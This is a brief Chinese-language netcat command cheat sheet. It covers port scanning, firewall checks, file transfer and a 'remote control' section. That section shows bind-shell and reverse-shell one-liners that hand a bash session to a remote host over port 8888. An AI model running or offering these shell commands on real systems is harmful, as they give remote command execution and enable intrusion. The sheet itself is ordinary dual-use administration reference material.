# TCP端口扫描
nc -v -z -w2 192.168.0.3 1-100 

# 扫描UDP端口
nc -u -z -w2 192.168.0.3 1-1000

# 扫描指定端口
nc -nvv 192.168.0.1 80

# 查看从服务器到目的地的出站端口 443 是否被防火墙阻止
nc -vz 192.168.2.4 443 -w2

# 文件传输
# 如果希望文件传输结束后自动退出，可以使用下面的命令：
nc -lp 8888 > node.tar.gz
nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz
# ⚠️ 注意：-i 表示闲置超时时间

# 远程控制
# 正向控制，被控端主动设置监听端口及bash环境，控制端连接，如果有防火墙，需开放端口，否则会被拦截。
# 被控制端执行下面的命令：
nc -lvnp 8888 -c bash
# 控制端执行下面的命令：
nc 192.168.75.121 8888

# 反向控制，控制端设置监听端口，被控端主动连接控制端的ip及端口，并提供bash环境。
# 控制端执行下面的命令：
nc -lvnp 8888
# 被控制端执行下面的命令：
nc 192.168.75.121 8888 -c bash

